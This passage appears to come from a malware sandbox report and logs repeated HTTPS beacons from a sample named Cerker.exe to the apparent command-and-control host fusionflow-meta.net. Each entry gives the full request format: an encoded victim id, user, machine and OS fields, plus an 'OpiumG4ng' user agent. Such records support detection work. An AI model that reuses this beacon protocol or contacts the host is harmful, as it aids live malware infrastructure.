2024-08-31 20:45:18 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50116	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:19 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:19 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WfoUkTMZMjUkekgVgZpZNmP4eZ5u%2F%2B%2FozwD3yKOQa6uLl54PLaRV8Nb0e5dRwC19mQRyecYXct4SK0cE14CWNPnL0NukwwTOhz4mFwu3Lj6JsoV91bk4uMBjOgVYs%2FKvEGNsQ5g%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd12a813c3f5-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:19 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50118	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:20 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:20 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HUajvJQs5iFdOGcf31Rco93pL27ALCkv0EW6eQlbHZUtjawiogguZr9cd1NyuJqAeS3NninsKPi%2BBcDY7i7hYeb78W3iwsaPjMYBJMOyqZl2jZ8t1pf%2BoyjX9Sy9DCwPcpWY5J46"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd1a4da54255-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:20 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50120	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:21 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:22 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghrJdMcX6%2Bi6S6Ej6PJ4%2F9BlaZzL9FObvjyK4%2BCwwS5mnoHUbe22LlC%2BwBjxlq99W%2Fu8qoTWjh69azLdpb13yIRRaPdSryspJKwKr5PLt%2F3xe8gLEO7aonuLA5SgMpmsbHrEilv1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd21cae0c440-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:22 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50122	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:22 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:23 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNk1dVYc%2BTYbr%2Byp0PjuBVgOvX14i8LsCuo7zTqxK8bhyuGEUGDxZDsGOCv40sKkWFAziznr8otHjpidZAYvlPGdFKZ9bmSk2kHCLiHqviGeZvFsavp36UxqlnsNPQVnzfFLPDwd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd294afa19eb-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:23 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50124	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:23 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:24 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0ft6%2FZsas0GWV%2B4%2FuoStw2s6bNDDC9prsrJwh8VwYrfq%2FGNdOyMAIZ2dKalle6l1E2nAB4w1RdajSvwdE6DhPhqK7yelVcplzXl4qpf7vmxHP9PG%2BuX3ml2sqGXMh5g%2BS%2BltlxL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd30cb9c42d8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:24 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50126	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:25 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:25 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vi%2BZ8hfFByBv8kCRBhgbgku2EEPWE2vb3cbhN%2F7YyQc3NFEh1qio%2Bo58B7jm9yQojDHyxcyiqduXuWDjUiYq0RNorI8ytloLEHzQ%2FJgiD0hWJ7wYi5vS3mIBzzWLSAkoSlAS96Je"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd38d8bd7295-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:25 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50129	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:26 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:27 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M9uvqw3%2FdyvKfiG%2FFSdkINaAaSMJxSToPQC6oviIVQSOdDBCt536e9Po28c10kNqfyr6ttvOz%2FbyUXUV%2FON8pAsdEPCq1PUOZxSkxA1CK1WOr0z4awSGKoJ%2Bn1RJnsw9XXwsUNBo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd401c8643d5-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:27 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50131	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:27 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:28 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ref85oMRjV7cHTClZUohC2J4uBiubhPWOWLzry6751Wt72kZitaJr%2FfkuArwrponNbYsInRC4G0djePa8aSZGX%2FTQaxF0jsaC9LW9wJOz%2BKOPJw718Ki4gDfKX7e1AeYOErZ2UP5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd489ab34263-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:28 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50134	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:28 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:29 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S6Rnq2GV9JeCmGtIBtrPdt5vhCPHC48jxkuPfNB9IyfbAhQrVtYJOwr6ePJ4mSlQOnUJVYG%2FVTlEgK6JVpgVfZCOC%2B0wtLghC742W6Nk6QNmnvAjEPPDoKopn%2F%2Buki6QpKnI6dNm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd501c80c3f8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:29 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50136	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:30 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:30 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3X4phPReqzuigW2l7NBAocMRyGliSHP6uQ%2F1ZPHPYbRGVagoIxxSqxWOjPiaujdRy2vcIT2njU0irk5jxYfPUUkW5kI3eSVafWF%2BTJFnt1xlyKokTMzlIBqN8kZhaH04oYRx32e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd57c87c42a5-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:30 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50138	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:31 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:32 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWAuW1jPeofXpLjPPrIXzKd8rizrhnHELtUcEKAeT494sPUwiz9fIAMFWlMNI7hRkufzwphV6DED3Vxbis%2BAW54LzxwYBwstsBDrPrm0yOT4MwRBdVywNSrYd6mKP935Taig8ixW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd5fc99672b7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:32 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	50141	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:32 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:33 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PiVTMEPF1yJfqntiVdb0o7hMvEv44oPtSfvTKcGN2BMoFJ8x%2F%2BaVmnq8jZhYnkLldxjWa1XLVIdGiGi7SrTAbrdDhoxOx172jS1GbYYZIwG68BfV%2B7ThWrOVeA8qpRQtNuhDhftz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd695a536a53-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:33 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	50144	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:34 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:34 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5XPZKCQOQJhCpvS5DUhv5ffN0TR%2BkG3ROuPXjZt%2Ba6PpCJ2bA5X5fP5tFTr0DTpo33%2FkfbkrMp%2FvBm6vsLxZgrPsuJBNUjhBgep1kg67Bwo0f9dh63MNqwC%2Ft52hKAzCTTIv6m1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd705952c459-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:34 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	50147	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:35 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:35 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACoy316nzI4HCxs%2Bb1rM4XvC3PraPhGtws5XBzop9%2F7r2wW%2Fus6PScAJmdTNUYX%2Bob%2BYoqci1D4xMGJlNNfehaudM4B2xPA95gpu4xgVFxBr2silpbukdUBgXeJCFfpbs%2FviSK%2FU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd77fd8a1899-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:35 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	50149	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:37 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:37 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1JFrMHjjmeBqHuiGhoZlAh7uvYJKFiJu9x9hYdwKIdnyhWzFm%2BYDJzLla8%2FrvH8MS3mid1274QsZKkujiPZaRPag1pMMRZ65iDmrffojmpBnxfhfdX%2BDHE7OyCfAsARw90hu5bxo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd83fd1543c5-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:37 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	50151	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:38 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
